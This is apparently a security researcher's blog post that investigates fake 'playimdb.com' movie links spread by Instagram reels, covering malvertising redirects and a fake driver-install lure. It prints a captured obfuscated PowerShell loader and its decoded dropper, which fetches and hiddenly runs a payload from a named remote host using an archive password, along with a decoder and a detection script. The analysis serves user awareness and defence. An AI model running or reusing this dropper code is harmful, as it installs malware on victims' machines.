Hey folks,
It has been a long gap, and today I have completed my investigation into the recent "IMDb free movie" trend. Many influencers are making reels about it without realising that viewers who follow the steps may get their devices hacked or fall into some kind of scam.
In this blog, I’m not talking about movie piracy or how to prevent it. My goal is to make people aware of how easily your device can get hacked just by visiting those websites.
What Happened?
From April 15, I started seeing many reels in my feed. Most of them followed the exact same script, and I wasn’t sure why the content was so repetitive.
The reel content usually says:
“Visit the IMDb page, search for your favorite movie, and now just add ‘play’ before imdb.com.
For example: playimdb.com. Now you can watch that movie for free. Share it with your friends if it’s working.”
The main motive of these reels is to force users to visit a website that claims to provide free movies and then ask them to share it with others.
Starting the Investigation
As a security person, I was curious about how IMDb could provide free movies online like an OTT platform. So I followed the same steps mentioned in the reel.
First, I realized that it was not actually IMDb. The official IMDb domain is: www.imdb.com. However, what influencers were saying in the reel was to add the word “play” before IMDb, resulting in www.playimdb.com, which is a completely different domain.
It is not an IMDb domain as they claim in the reels.
The movie started playing, but if I clicked anywhere on the page, it redirected me to other websites. People are trusting it because IMDb is a well-known and genuine platform.
That is where my analysis started.
Real Example & URL Breakdown
Example:
Original: https://www.imdb.com/title/tt1757678/
Modified: https://www.playimdb.com/title/tt1757678/
Result: Redirected → https://streamimdb.ru/embed/movie/tt1757678
For those who are not familiar with URLs, refer to the breakdown below:
URL:
https://www.imdb.com/title/tt1757678/
| Parameter | Type | Description |
|---|---|---|
| Protocol | string | `https://` — Secure web communication (TLS) |
| Subdomain | string | `www` — Web host |
| Domain | string | `imdb.com` — Official Internet Movie Database server |
| Endpoint | string | `/title/` — Route for movie/TV resources |
| Resource_ID | string | `tt1757678` — Unique IMDb title identifier |
| Trailing_Slash | string | `/` — Optional directory-style ending |
| Method | string | `GET` — Fetches the resource |
Key Observation
playimdb.com and imdb.com are completely different domains.
If you visit playimdb.com, it redirects to another domain:
https://streamimdb.ru/embed/movie/tt1757678
Technical Proof (cURL)
You can verify the redirection using:
```shell
curl -X GET "https://playimdb.com/title/tt1757678/" -i
```
Response headers:
```
HTTP/2 302
date: Thu, 30 Apr 2026 06:44:56 GMT
content-type: text/html; charset=UTF-8
server: cloudflare
nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
location: //streamimdb.ru/embed/movie/tt1757678
cf-cache-status: DYNAMIC
report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=0SVogWpNTduQUKrmMDyACbnPjTvMD6AmPogQo1d6ud37gIHzfA8lP6ryymkMwG1dAYiQ9aPGxFN0GPMtzjzndBEJnA1fs6%2FwjzG%2BfudAs72%2BALZNmjl2f6sx%2Fis6ANU%3D"}]}
cf-ray: 9f4494aad97f3c4f-MAA
alt-svc: h3=":443"; ma=86400
```
The Location header points to an external domain (streamimdb.ru), which confirms that the website is not related to IMDb and simply redirects visitors elsewhere. Note the scheme-relative form `//streamimdb.ru/...`: the browser keeps the `https://` scheme of the original request and follows it to the other domain.
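To make the URL breakdown and the redirect check above concrete, here is an added Python example (not code from the original post). It splits a URL into the fields listed in the table, parses the captured response head, resolves the scheme-relative Location header the way a browser does, and reports whether the redirect leaves the original domain. The helper names and the two-label registrable-domain rule are my own simplifications (a production check would use the Public Suffix List); the sample response is constructed from the headers shown above.

```python
# Added example: URL breakdown and redirect resolution for the playimdb.com case.
from urllib.parse import urlparse, urljoin


def breakdown(url):
    """Split a URL into the fields used in the table above."""
    p = urlparse(url)
    host = p.hostname or ""
    labels = host.split(".")
    # Simplification (assumption): registrable domain = last two labels.
    # Good enough for .com/.ru; a real check would use the Public Suffix List.
    domain = ".".join(labels[-2:]) if len(labels) >= 2 else host
    subdomain = ".".join(labels[:-2])
    parts = [seg for seg in p.path.split("/") if seg]
    return {
        "protocol": p.scheme + "://",
        "subdomain": subdomain,
        "domain": domain,
        "endpoint": "/" + parts[0] + "/" if parts else "/",
        "resource_id": parts[1] if len(parts) > 1 else "",
        "trailing_slash": p.path.endswith("/"),
    }


def parse_response_head(raw):
    """Parse a status line plus headers (HTTP/1.1 or the HTTP/2 form curl prints).
    Returns (status_code, {lower-cased header name: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def follow_redirect(request_url, raw_response):
    """Resolve the Location header against the request URL.
    Returns (target_url, left_original_domain)."""
    status, headers = parse_response_head(raw_response)
    if status not in (301, 302, 303, 307, 308) or "location" not in headers:
        return request_url, False
    # urljoin handles scheme-relative targets such as //streamimdb.ru/... by
    # inheriting https:// from the request URL, exactly as a browser does.
    target = urljoin(request_url, headers["location"])
    left = breakdown(target)["domain"] != breakdown(request_url)["domain"]
    return target, left


# Constructed sample: the relevant lines of the curl response shown above.
SAMPLE_RESPONSE = """HTTP/2 302
content-type: text/html; charset=UTF-8
server: cloudflare
location: //streamimdb.ru/embed/movie/tt1757678
cf-cache-status: DYNAMIC
"""

if __name__ == "__main__":
    for u in ("https://www.imdb.com/title/tt1757678/",
              "https://www.playimdb.com/title/tt1757678/"):
        print(u, breakdown(u))
    target, left = follow_redirect("https://playimdb.com/title/tt1757678/", SAMPLE_RESPONSE)
    print("redirects to:", target, "| leaves original domain:", left)
```

Running it shows that `imdb.com` and `playimdb.com` are different registrable domains, and that the 302 lands on `https://streamimdb.ru/embed/movie/tt1757678`, a third domain again.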
Malvertising & Redirect Behavior
The important part is that while the movie appears to play, the website is affected by malvertising redirects.
If you randomly click anywhere on the site—such as pause, play, forward, backward, or volume controls—it redirects you to multiple external websites on each click.
I tested this behavior on both Chrome and Firefox browsers. In Firefox, the site aggressively forced me to install a browser extension.
PoC Video
I have decompiled and analyzed the extension. I will publish a separate blog explaining the full analysis in detail. For now, here are some of the potential impacts of installing unauthorized browser add-ons:
Impacts of Installing an Unauthorized Browser Add-on
- Passwords can be stolen from login forms
- Session cookies can be hijacked to access your accounts
- Browsing history and personal data can be monitored
- Banking or payment pages can be manipulated
- Forced redirects to scam or phishing sites
- Ads injected into pages you visit
- Clipboard data (passwords, crypto addresses) can be read
- Keystrokes can be logged while typing
- Screenshots or page content can be captured
- Malware can be silently downloaded to your device
- Homepage, search engine, or new tab settings can be changed
- Your data may be sold to third parties
- Social media or email accounts can be compromised
- System performance may slow down due to hidden scripts
Different Attack Observed on Chrome
I tested the same scenario on Chrome, and this time the attack behavior was completely different.
After opening the same fake IMDb site and clicking anywhere, it redirected me to a fake adult website (similar to Xhamster).
When I clicked on “Yes, 18+”, my browser immediately switched to full-screen mode, creating a more convincing and controlled environment.
Then, a fake message appeared saying that drivers were being installed and instructed me not to turn off my PC.
This is a common scare tactic used to trick users into believing that a legitimate system process is running, while in reality it may be attempting to:
- Scare users into taking further actions
- Trick users into downloading malicious files
- Redirect users to additional scam or phishing pages
- Exploit user trust by simulating system-level activity
PoC Video
Malicious Code Analysis (Obfuscated Script)
I was curious about what was actually executed in the command line, so I copied the entire data and saved it in Notepad for analysis.
The code started with:
<# Verification code: 27D393FB111A #>
To a non-developer this may look like a security or verification code, but `<# ... #>` is a PowerShell block comment: it is never executed and only serves to make the pasted text look legitimate.
The rest of the code was in hexadecimal format mixed with characters, which clearly indicates obfuscation. So I decided to analyze it deeply and decode the entire script to understand what it was actually doing.
Captured Payload
```powershell
<# Verification code: 27D393FB111A #>
$w23='gOXJVW';
$x24='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';
$y25='';
for($z26=0;$z26 -lt $x24.Length;$z26+=2){
$y25+=[char](([convert]::ToInt32($x24.Substring($z26,2),16))-bxor[int][char]$w23[$z26/2%$w23.Length])
};
&([ScriptBlock]::Create($y25))
```
What This Code Does
- The script is heavily obfuscated using hexadecimal encoding
- It uses XOR operations (`-bxor`) to decode the hidden payload
- A loop reconstructs the actual malicious script from the encoded data
- The decoded content is then executed dynamically using `ScriptBlock`
Key Insight
This type of technique is commonly used in malware to hide the real payload and bypass basic detection mechanisms.
Once decoded, the script can perform any malicious activity such as downloading malware, stealing data, or executing further commands on the system.
Decoding Process
The rest of the code is one long hex string, so I wrote a short Python script to decode the whole payload and see what it actually does.
```python
# Decoder for the captured stage. The hex payload itself was removed from this
# copy of the post, so the placeholder below must be replaced with the captured
# hex string before the script will run.
hex_payload = """
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
"""
xor_key = "gOXJVW"


def decode_payload(hex_payload, xor_key):
    # Strip whitespace and newlines, then turn the hex text into raw bytes
    cleaned_hex = "".join(hex_payload.split())
    raw_bytes = bytes.fromhex(cleaned_hex)
    result = []
    key_length = len(xor_key)
    # Mirror the PowerShell loop: byte i is XORed with key[i % len(key)]
    for index, byte in enumerate(raw_bytes):
        key_char = ord(xor_key[index % key_length])
        result.append(chr(byte ^ key_char))
    return "".join(result)


decoded_powershell = decode_payload(hex_payload, xor_key)
print(decoded_powershell)
```
In the above code, I use two hardcoded strings: one is the key and the other is the hex value, which is the actual malware code. By running the above code, it simply decodes and prints the output in the terminal.
Output (Decoded PowerShell Script)
```powershell
$vffkeo = '
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
$g7 = "7z"
$h8 = "wh195dV89dWg"
# Create temp directory
$i9 = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName())
New-Item -ItemType Directory -Path $i9 -Force | Out-Null
# Define file paths
$j10 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + ".exe")
$k11 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + "." + $g7)
$l12 = 0
# Retry download loop
for ($m13 = 0; $m13 -lt 3 -and -not $l12; $m13++) {
    try {
        if (-not (Test-Path $j10)) {
            Invoke-WebRequest -Uri "https://nslsconscloud.beer/api/7z.exe" `
                -OutFile $j10 -UseBasicParsing
        }
        Invoke-WebRequest -Uri "https://nslsconscloud.beer/api/index.php?a=dl&token=85af6837e5482b759e06c92cfa3ad1fcc32f25c0aea3ff6a4cf612c1c7b7e907&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fbilboad.com%2Fcheckd%2Frecap.php&mode=recaptcha" `
            -OutFile $k11 -UseBasicParsing
        if (Test-Path $k11) {
            $l12 = 1
        } else {
            Start-Sleep -Seconds 2
        }
    } catch {
        Start-Sleep -Seconds 2
    }
}
if (-not (Test-Path $k11)) {
    exit
}
# Create extraction directory
$n14 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName())
New-Item -ItemType Directory -Path $n14 -Force | Out-Null
# Prepare extraction arguments
$o15 = @("x", "-y")
if ($h8 -ne "") {
    $o15 += ("-p" + $h8)
}
$o15 += ("-o" + $n14)
$o15 += $k11
# Extract payload
if (Test-Path $j10) {
    & $j10 @o15 | Out-Null
} else {
    Start-Process -FilePath $k11 -WindowStyle Hidden
}
# Search for executable payload
$p16 = Get-ChildItem -Path $n14 -Filter *.exe -Recurse -File | Select-Object -First 1
$q17 = Get-ChildItem -Path $n14 -Filter *.msi -Recurse -File | Select-Object -First 1
$r18 = $null
$s19 = $null
if ($p16) {
    $r18 = $p16.FullName
    $s19 = $p16.Directory.FullName
} elseif ($q17) {
    $r18 = $q17.FullName
    $s19 = $q17.Directory.FullName
} else {
    $r18 = $k11
}
# Execute payload
if ($r18) {
    if ($s19) {
        Start-Process -FilePath $r18 -WorkingDirectory $s19 -WindowStyle Hidden
    } else {
        Start-Process -FilePath $r18 -WindowStyle Hidden
    }
}
# Cleanup
try {
    Remove-Item -LiteralPath $k11 -Force -ErrorAction SilentlyContinue
} catch {}
try {
    if (Test-Path $j10) {
        Remove-Item -LiteralPath $j10 -Force -ErrorAction SilentlyContinue
    }
} catch {}
'
# Execute in hidden PowerShell
Start-Process -WindowStyle Hidden powershell -ArgumentList `
    "-NoProfile", "-WindowStyle", "Hidden", "-Command", $vffkeo
exit
```
PowerShell Payload Behavior
This PowerShell payload silently downloads a tool and a password-protected archive from a remote server, extracts it into a temporary folder, executes the hidden file inside, and then deletes traces to remain stealthy.
Execution Steps
- Enables TLS 1.2 and creates random folders in `%TEMP%`
- Downloads `7z.exe` from https://nslsconscloud.beer/api/7z.exe
- Downloads a password-protected archive from: https://nslsconscloud.beer/api/index.php?a=dl&token=85af6837e5482b759e06c92cfa3ad1fcc32f25c0aea3ff6a4cf612c1c7b7e907&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fbilboad.com%2Fcheckd%2Frecap.php&mode=recaptcha
- Extracts the archive using the password `wh195dV89dWg`
- Searches for the first `.exe` or `.msi` file and executes it in hidden mode
- Deletes the downloaded archive and the `7z` tool to remove evidence
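As an added example (not from the original post) covering both the obfuscation technique described under Key Insight and the dropper behaviour listed above, the following Python script does a static triage of PowerShell text without executing it. It matches the indicators a defender would look for (XOR decode loop, hex-to-int conversion, `ScriptBlock::Create`, download cmdlets, hidden windows, `%TEMP%` staging, cleanup, the fake "verification code" comment) and extracts URLs and the 7-Zip archive password from a decoded dropper. Both samples are constructed to resemble the captured stages: the hex literal is a dummy, the `.invalid` domains and the password are placeholders rather than the real infrastructure, and the indicator set and the threshold in `is_loader` are my own choices.

```python
# Added example: static triage of a PowerShell loader (no execution involved).
import re

# Constructed sample of the obfuscated first stage, shaped like the captured
# payload above; the hex literal is a dummy, not the real one.
STAGE1 = r"""<# Verification code: 000000000000 #>
$w23='gOXJVW';
$x24='00112233445566778899';
$y25='';
for($z26=0;$z26 -lt $x24.Length;$z26+=2){
$y25+=[char](([convert]::ToInt32($x24.Substring($z26,2),16))-bxor[int][char]$w23[$z26/2%$w23.Length])
};
&([ScriptBlock]::Create($y25))
"""

# Constructed sample of a decoded dropper; the .invalid domains and the
# password are placeholders, not the real infrastructure.
STAGE2 = r"""
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
$h8 = "SamplePass123"
$i9 = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName())
Invoke-WebRequest -Uri "https://dropper.invalid/api/7z.exe" -OutFile $j10 -UseBasicParsing
Invoke-WebRequest -Uri "https://dropper.invalid/api/index.php?a=dl&token=abc" -OutFile $k11 -UseBasicParsing
$o15 = @("x", "-y")
$o15 += ("-p" + $h8)
Start-Process -FilePath $r18 -WindowStyle Hidden
Remove-Item -LiteralPath $k11 -Force -ErrorAction SilentlyContinue
"""

# Indicator name -> pattern. Each one alone is weak (admins use Remove-Item
# too); several together describe a loader. The set and threshold are
# assumptions chosen for this example, not a vendor rule set.
INDICATORS = {
    "xor_decode": re.compile(r"-bxor", re.I),
    "hex_to_int": re.compile(r"\[convert\]::ToInt32\(.+?,\s*16\)", re.I),
    "dynamic_exec": re.compile(r"\[ScriptBlock\]::Create\(|Invoke-Expression|\biex\b", re.I),
    "long_hex_literal": re.compile(r"'[0-9a-fA-F]{16,}'"),
    "download": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "temp_staging": re.compile(r"\$env:TEMP|GetRandomFileName", re.I),
    "cleanup": re.compile(r"\bRemove-Item\b", re.I),
    "fake_verification_comment": re.compile(r"<#\s*Verification code", re.I),
}
LOADER_THRESHOLD = 3


def indicators(script):
    """Sorted names of the indicators that match the script text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def is_loader(script):
    """Verdict: enough independent loader traits to warrant a closer look."""
    return len(indicators(script)) >= LOADER_THRESHOLD


def extract_iocs(script):
    """Pull URLs and the 7-Zip archive password out of a decoded dropper."""
    urls = re.findall(r'''https?://[^\s"'`]+''', script)
    passwords = []
    # The password is whatever variable gets concatenated onto 7-Zip's -p switch.
    for var in re.findall(r'\("-p"\s*\+\s*\$(\w+)\)', script):
        m = re.search(r'\$' + re.escape(var) + r'\s*=\s*"([^"]*)"', script)
        if m:
            passwords.append(m.group(1))
    return {"urls": sorted(set(urls)), "archive_passwords": passwords}


if __name__ == "__main__":
    for name, text in (("stage1", STAGE1), ("stage2", STAGE2)):
        print(name, "indicators:", indicators(text), "| loader:", is_loader(text))
    print("IOCs:", extract_iocs(STAGE2))
```

The point of separating `indicators` from `is_loader` is that the first stage and the decoded stage trip different sets (decode-and-execute versus download-stage-run-cleanup), and an analyst wants to see which traits fired, not just a boolean. The extracted URLs and password are what you would feed into blocklists and the archive triage step, again without ever running the sample.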
Impacts of This Malware Dropper Behavior
- Silent malware installation without user knowledge
- Remote attacker control by pulling payloads from an external server
- Execution of hidden programs (`.exe`/`.msi`) in the background
- Bypasses basic security using TLS and legitimate tools (7-Zip)
- Data theft risk (files, saved passwords, browser data)
- Credential compromise and possible account takeovers
- System persistence if the payload installs startup tasks or services
- Removes traces by deleting downloaded tools and archives
- Enables further malware delivery (ransomware, spyware, RATs, miners)
- Network spread risk to other machines on the same network
- May force users to run commands in PowerShell, leading to full system compromise
Final Thoughts
Instagram is a powerful platform to share knowledge, thoughts, and creativity. Influencers act like pillars by spreading valuable content that can inspire and educate thousands.
However, chasing views with misleading or harmful content can cause serious damage, mislead users, and create long-term consequences.
Use your reach responsibly: what you post can shape minds, for better or worse.